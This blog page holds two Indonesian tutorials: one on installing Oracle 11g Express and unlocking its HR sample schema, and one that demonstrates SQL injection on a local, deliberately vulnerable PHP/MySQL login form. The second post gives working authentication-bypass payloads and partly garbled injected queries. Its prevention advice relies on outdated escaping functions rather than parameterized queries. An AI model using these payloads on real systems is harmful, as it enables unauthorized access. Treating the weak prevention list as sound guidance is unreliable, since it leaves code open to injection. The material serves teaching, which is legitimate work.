Database Oracle 11g untuk Latihan Query SQL


ri32-oracle-11g

Latar Belakang

Saat ini saya sedang kursus database Oracle di Kampus, setiap hari sabtu selama 18 pertemuan. Jadi saya coba menginstall dan mempraktekan materi-materinya. Sebelumnya saya pernah menulis beberapa artikel terkait penerapan database Oracle 10g dengan bahasa pemrograman PHP.

Instalasi Database Oracle

Untuk file instalasi Oracle 10g sudah tidak disediakan lagi secara online oleh pihak Oracle. yang tersedia hanya Oracle 11g (grid computing) dan Oracle 12c (cloud computing). Sehingga jika kita ingin menggunakan database Oracle 10g untuk keperluan edukasi, kita harus mencari ke situs yang menyediakan file instalasi seperti getintopc.com

  1. Download dan Install Oracle 11g
  2. Proses Instalasi Oracle 11g lebih sederhana dibandingkan Oracle 10g
  3. Kita hanya diminta memasukan password system
  4. Jika telah selesai maka di desktop ada icon Get Started With Oracle Database 11g Express Edition
  5. Silahkan cek juga di Start Menu->All Programs->Oracle Database 11g Express Edition
  6. Pastikan database oracle sudah berjalan Start Menu->All Programs->Oracle Database 11g Express Edition->Start Database

Untuk masuk ke Oracle ada beberapa cara yaitu :

  1. Melalui Command Line Start Menu->All Programs->Oracle Database 11g Express Edition->Run SQL Command Line
  2. Melalui Web Browser Start Menu->All Programs->Oracle Database 11g Express Edition->Get Started
  3. Melalui Software Oracle SQL Developer

 Membuka Database HR (Human Resource)

  1. Sebagaimana yang ada pada tutorial Unlock HR Using the SQL Command Line
  2. Buka SQL Command Line Start Menu->All Programs->Oracle Database 11g Express Edition->Run SQL Command Line
  3. Ketik connect kemudian tekan enter
  4. Masukan  username : system dan password system yang telah diinput saat proses instalasi
  5. Jika berhasil login maka akan ada tulisan Connected
  6. Kemudian ketik dan tekan enter ALTER USER hr ACCOUNT UNLOCK;
  7. Kemudian ketik dan tekan enter ALTER USER hr IDENTIFIED BY  bismillah;
  8. Sehingga untuk mengakses database HR kita gunakan username hr dan password bismillah
  9. Untuk keluar silahkan ketik exit kemudian tekan enter

Mengakses Database Melalui Command Line

  1. Buka Command Line ketik connect
  2. Kemudian masukan username hr dan password bismillah
  3. Jika berhasil login maka akan ada tulisan Connected
  4. Ketik select * from employees;
  5. Jika datanya muncul maka silahkan lanjutkan dengan query yang lain

Setup Application Express

  1. Buka Menu Start Menu->All Programs->Oracle Database 11g Express Edition->Get Started
  2. Atau klik icon yang ada di desktop Get Started With Oracle Database 11g Express Edition
  3. Semuanya akan mengarah ke web browser misalnya google chrome
  4. Setelah itu klik top menu Application Express
  5. Masukan username : system dan password system yang telah diinput saat proses instalasi
  6. Untuk menggunakan Application Express kita harus membuat sebuah workspace
  7. Pilih database user : Use Existing
  8. Pilih atau langsung ketik database username : HR
  9. Masukan Application Express Username misalnya : HR_APEX
  10. Masukan Password dan Konfirmasi Password misalnya : alhamdulillah
  11. Password yang digunakan oleh username HR_APEX boleh berbeda dengan username HR
  12. Sehingga username HR digunakan untuk Command Line sedangkan HR_APEX digunakan untuk Application Express

Mengakses Database Melalui Application Express

  1. Setelah berhasil membuat username, maka klik tombol Already have an account? Login Here
  2. Atau bisa melalui URL http://127.0.0.1:8081/apex/
  3. Setelah berhasil login maka pilih menu SQL Workshop->SQL Command
  4. Ketik select * from employees;
  5. Kemudian klik tombol Run
  6. Jika datanya muncul maka silahkan lanjutkan dengan query yang lain

Oracle Fundamental 

Sekian artikel dari saya semoga bermanfaat untuk teman-teman dan anda semua…aamiin

Bogor, 29-09-2017

KangAgus

Advertisements

Contoh SQL Injection dengan PHP dan MySQL


sql-injection

Latar Belakang

SQL injection mengacu pada tindakan seseorang memasukkan pernyataan SQL untuk dijalankan pada database tanpa sepengetahuan kita. Injeksi biasanya terjadi ketika kita meminta pengguna untuk input data, seperti nama atau password mereka. dan bukannya nama, tapi mereka memberikan pernyataan SQL bahwa kita tidak sadar pernyataan SQL tersebut akan berjalan pada database kita.

Cara Penggunaan

  1. Download contoh form login yang akan di injection
  2. Import database db_injection.sql.zip via phpmyadmin
  3. Copy folder web_injection ke dalam folder htdocs
  4. Buka halaman register untuk mendaftarkan admin baru dengan alamat URL  http://localhost/web_injection/register.php
  5. Buka halaman login dengan alamat URL http://localhost/web_injection/index.php

Query Login yang digunakan

  • Jika kemungkinan query menggunakan awalan kutip satu ‘, maka inject dengan kutip dua. contoh querynya sebagai berikut : $query=select * from admin where username=”‘.$username.'” and password=MD5(“‘.$password.'”);
  • Jika kemungkinan query menggunakan awalan kutip dua “, maka inject dengan kutip satu. contoh querynya berikut : $query=select * from admin where username=’$username’ and password=MD5(‘$password’);

Cara Injection

  1.  Buka halaman login dengan URL http://localhost/web_injection/index.php
  2. Masukan username admin’ /*
  3. Masukan password hacked’)*/ OR (‘1’=’1

Injection username dan password

  • Jika kemungkinan query menggunakan kutip satu, maka inject dengan kutip dua, menggunakan Username : admin” /* Password : hacked”)*/ OR (“1″=”1
  • Jika kemungkinan query menggunakan kutip dua, maka inject dengan kutip satu. menggunakan Username : admin’ /* Password : hacked’)*/ OR (‘1’=’1

Query inject

select * from admin where username=’ admin’ / ‘ and password=MD5(‘ hacked’)/ OR (‘1’=’1 ‘)

Menggunakan teknik comment

select * from admin where username=’admin’ /‘ and password=MD5(‘hacked’)/ OR (‘1’=’1’)

Parsing Query setelah di inject

select * from admin where username=’adminOR (‘1’=’1’)

Output

Berhasil Login

Berhasil Login

Password Salah

Gagal Login

1

Login by SQL Injection

Cara Mencegah SQL Injection 

  1. Menggunakan fungsi PHP mysql_real_escape_string(), htmlentities(), htmlspecialchars(), strip_tags(), stripslashes(), mysql_escape_string(), get_magic_quotes_gpc() dan addslashes()
  2. Membatasi panjang input box.
  3. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
  4. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

Free Download :

http://sourcecode.kangagus.id/script-sql-injection-form-login

Koleksi Buku :

Sekian artikel dari saya semoga bermanfaat untuk teman-teman dan anda semua…aamiin

Cilangkap, 28 Juni 2013

GusnaNuri

%d bloggers like this: